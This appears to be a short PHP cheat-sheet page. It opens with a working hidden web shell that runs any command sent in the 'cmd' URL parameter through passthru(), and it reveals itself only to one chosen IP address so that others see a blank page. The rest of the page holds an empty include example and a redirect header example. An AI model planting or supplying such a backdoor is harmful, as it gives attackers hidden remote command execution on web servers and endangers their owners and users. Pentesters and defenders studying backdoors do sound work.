# PHP

This creates a hidden webshell on a page which will only display if connecting from a previously defined IP.

```php
<?php
    if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
        echo 'you have a nice IP, have a cool secret!<br><br>';
        echo passthru($_GET['cmd']);
    } else {
        echo '';
    }
?>
```

### Inclusion

Adding the `include` or `require` allows the page to execute PHP code from other files. This can be used for a header or footer file.

```php
<?php

```

Adding a header to the page

```php
<?php
    header('Location: https://m4lwhere.org');
?>
```